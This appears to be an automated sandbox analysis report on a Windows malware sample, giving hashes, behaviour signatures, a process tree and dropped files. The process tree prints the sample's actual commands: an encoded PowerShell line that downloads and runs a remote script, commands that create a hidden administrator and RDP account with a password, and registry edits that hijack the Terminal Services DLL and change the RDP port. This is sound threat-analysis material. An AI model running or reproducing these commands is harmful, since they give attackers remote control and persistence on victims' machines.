Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    10-10-2021 20:55

General

  • Target

    5t6yujh.exe

  • Size

    5.7MB

  • MD5

    211ca7c8d5fd20f7dcaebdbe354662be

  • SHA1

    1111e864f3e9d2e6879c5179c4136638b05b67c9

  • SHA256

    aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175

  • SHA512

    d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe
    "C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cl0utud4\cl0utud4.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB396.tmp" "c:\Users\Admin\AppData\Local\Temp\cl0utud4\CSC1C0B95F9BF8B4ABEAD5C3A512DFC798E.TMP"
          4⤵
            PID:2092
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3296
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3912
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3164
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1068
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1524
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:344
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2160
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3980
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1260
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2112
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3004
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3416
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3064
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3616
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4012
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3004
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2104
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3308
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:2132
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc Qlhdaxqa /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3580
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc Qlhdaxqa /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:892
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc Qlhdaxqa /add
                          3⤵
                            PID:3296
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2936
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1520
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:1268
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4016
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3912
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              3⤵
                                PID:3164
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:604
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:504
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:2840
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc Qlhdaxqa
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1376
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc Qlhdaxqa
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1972
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc Qlhdaxqa
                                  3⤵
                                    PID:3600
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2904
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:844
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:2160
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:4012
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                    PID:1360
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      2⤵
                                        PID:1140
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Drops file in Program Files directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3924

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\RESB396.tmp

                                      MD5

                                      27fd5c439f34483e003421637fb7df84

                                      SHA1

                                      b114d704107b870cdb03c6039b4d0361aed4c99a

                                      SHA256

                                      565db63b905460e0cea10a595e35326fb7207741038b36ba763a0aba52af7e3e

                                      SHA512

                                      fcedf8648fe5b41afa2da5bbef7ce2938397ed69d5d0971c57a332abfb6d238e301882a9a716a151eff68bafd47b58e4d973f73aaac94d5d2b97b421d74e7719

                                    • C:\Users\Admin\AppData\Local\Temp\cl0utud4\cl0utud4.dll

                                      MD5

                                      9c485f1886db669ce0f18b4ae9ee3713

                                      SHA1

                                      3f69655ea5770c499b30b5da4d4fef7851ca4e81

                                      SHA256

                                      d1f4a05a03430350b59584586ee66a52abd2b892be17e45357dd507db3e67bc6

                                      SHA512

                                      5b381294f7a8885e7cdd726c57ba34a38d998b2216c02ae94f2a1faf703b2600fe2b45b8089543bb7da07d1499f332705c35eac7117376aea0ffde60b328c33b

                                    • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                      MD5

                                      a9176019ae2f0af22af200ca4f842b59

                                      SHA1

                                      22c13657a4210aca116ab63d2f806906dda954fd

                                      SHA256

                                      af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739

                                      SHA512

                                      5171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b

                                    • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                      MD5

                                      28d9755addec05c0b24cca50dfe3a92b

                                      SHA1

                                      7d3156f11c7a7fb60d29809caf93101de2681aa3

                                      SHA256

                                      abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                      SHA512

                                      891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                    • \??\c:\Users\Admin\AppData\Local\Temp\cl0utud4\CSC1C0B95F9BF8B4ABEAD5C3A512DFC798E.TMP

                                      MD5

                                      eb7bd0c44ed596ed0459a2a26b5e8265

                                      SHA1

                                      ca50499dcfadb2f585f3b637ee7204af073e6403

                                      SHA256

                                      46b16e117222c3d35cf3577fe05a4f53998173ccaf960d4c0841f781fd1486d0

                                      SHA512

                                      759c010a5e21eb8ff19d48d95590c2d604ccb6f1ec72d213df485ada31f04bbce5f3b13b2fe8ce33c3d952bd977ecfe7b49e4aa35881fbea151ea52bd0d79c28

                                    • \??\c:\Users\Admin\AppData\Local\Temp\cl0utud4\cl0utud4.0.cs

                                      MD5

                                      9f8ab7eb0ab21443a2fe06dab341510e

                                      SHA1

                                      2b88b3116a79e48bab7114e18c9b9674e8a52165

                                      SHA256

                                      e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                      SHA512

                                      53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                    • \??\c:\Users\Admin\AppData\Local\Temp\cl0utud4\cl0utud4.cmdline

                                      MD5

                                      65ae6ee47c1d56a526558870af21cf6e

                                      SHA1

                                      6898bf425084ce3fd511332fbbf76cdb6a21e643

                                      SHA256

                                      78ddcd3a68ec85c5ce0c52110a7d82bdb69f4d13e80fa9463774746db5e77cc3

                                      SHA512

                                      1e2d803e404d294343e74510a120e026b0e14abd55b3a2577e67d663a17a94e615db593d447619d2331d2e148498782ed294c2aa121e2d6e6c391844951de704

                                    • \Windows\Branding\mediasrv.png

                                      MD5

                                      9453615d542c9b0d521b429b9794e07d

                                      SHA1

                                      6c543926f7fcb171970bcca59a4fff36873a50a3

                                      SHA256

                                      b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34

                                      SHA512

                                      b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34

                                    • \Windows\Branding\mediasvc.png

                                      MD5

                                      1b1412c2f9d041ad20da79f2d5a3b130

                                      SHA1

                                      8ac8f1a8c75daf1f150f6bb103c1ccc510067758

                                      SHA256

                                      126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f

                                      SHA512

                                      3dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc

                                    • memory/344-345-0x0000000000000000-mapping.dmp

                                    • memory/504-366-0x0000000000000000-mapping.dmp

                                    • memory/844-370-0x0000000000000000-mapping.dmp

                                    • memory/892-360-0x0000000000000000-mapping.dmp

                                    • memory/1068-307-0x0000000000000000-mapping.dmp

                                    • memory/1140-372-0x0000000000000000-mapping.dmp

                                    • memory/1260-350-0x0000000000000000-mapping.dmp

                                    • memory/1268-363-0x0000000000000000-mapping.dmp

                                    • memory/1404-114-0x000001CCEFCF0000-0x000001CCF00EF000-memory.dmp

                                      Filesize

                                      4.0MB

                                    • memory/1404-119-0x000001CCEF8D6000-0x000001CCEF8D7000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1404-118-0x000001CCEF8D5000-0x000001CCEF8D6000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1404-117-0x000001CCEF8D3000-0x000001CCEF8D5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1404-116-0x000001CCEF8D0000-0x000001CCEF8D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-126-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-129-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-120-0x0000000000000000-mapping.dmp

                                    • memory/1472-121-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-138-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-134-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-132-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-147-0x0000025471130000-0x0000025471131000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1472-131-0x0000025471C10000-0x0000025471C11000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1472-149-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-153-0x0000025472EF0000-0x0000025472EF1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1472-154-0x0000025471118000-0x0000025471119000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1472-155-0x0000025473280000-0x0000025473281000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1472-122-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-130-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-140-0x0000025471116000-0x0000025471118000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-123-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-124-0x000002546F1D0000-0x000002546F1D2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-128-0x0000025471113000-0x0000025471115000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-127-0x0000025471110000-0x0000025471112000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1472-125-0x00000254710E0000-0x00000254710E1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/1520-362-0x0000000000000000-mapping.dmp

                                    • memory/1524-344-0x0000000000000000-mapping.dmp

                                    • memory/1812-139-0x0000000000000000-mapping.dmp

                                    • memory/1972-368-0x0000000000000000-mapping.dmp

                                    • memory/2092-143-0x0000000000000000-mapping.dmp

                                    • memory/2112-351-0x0000000000000000-mapping.dmp

                                    • memory/2132-359-0x0000000000000000-mapping.dmp

                                    • memory/2160-348-0x0000000000000000-mapping.dmp

                                    • memory/2840-367-0x0000000000000000-mapping.dmp

                                    • memory/3004-456-0x0000000000000000-mapping.dmp

                                    • memory/3004-352-0x0000000000000000-mapping.dmp

                                    • memory/3064-354-0x0000000000000000-mapping.dmp

                                    • memory/3164-306-0x0000000000000000-mapping.dmp

                                    • memory/3164-365-0x0000000000000000-mapping.dmp

                                    • memory/3296-262-0x0000021961880000-0x0000021961882000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3296-263-0x0000021961883000-0x0000021961885000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3296-295-0x0000021961888000-0x000002196188A000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3296-294-0x0000021961886000-0x0000021961888000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3296-247-0x0000000000000000-mapping.dmp

                                    • memory/3296-361-0x0000000000000000-mapping.dmp

                                    • memory/3308-358-0x0000000000000000-mapping.dmp

                                    • memory/3416-353-0x0000000000000000-mapping.dmp

                                    • memory/3600-369-0x0000000000000000-mapping.dmp

                                    • memory/3616-355-0x0000000000000000-mapping.dmp

                                    • memory/3788-165-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-169-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-180-0x0000022583E36000-0x0000022583E38000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-220-0x0000022583E38000-0x0000022583E3A000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-176-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-163-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-174-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-173-0x0000022583E33000-0x0000022583E35000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-162-0x0000000000000000-mapping.dmp

                                    • memory/3788-172-0x0000022583E30000-0x0000022583E32000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-171-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-164-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-170-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-166-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3788-168-0x0000022583E00000-0x0000022583E02000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3912-364-0x0000000000000000-mapping.dmp

                                    • memory/3912-305-0x0000000000000000-mapping.dmp

                                    • memory/3924-441-0x00000214F8B38000-0x00000214F8B39000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3924-384-0x00000214F8B33000-0x00000214F8B35000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3924-390-0x00000214F8B36000-0x00000214F8B38000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3924-373-0x0000000000000000-mapping.dmp

                                    • memory/3924-383-0x00000214F8B30000-0x00000214F8B32000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/3980-349-0x0000000000000000-mapping.dmp

                                    • memory/4012-455-0x0000000000000000-mapping.dmp

                                    • memory/4012-371-0x0000000000000000-mapping.dmp

                                    • memory/4064-222-0x0000015D2C0C0000-0x0000015D2C0C2000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/4064-261-0x0000015D2C0C8000-0x0000015D2C0CA000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/4064-226-0x0000015D2C0C6000-0x0000015D2C0C8000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/4064-224-0x0000015D2C0C3000-0x0000015D2C0C5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/4064-205-0x0000000000000000-mapping.dmp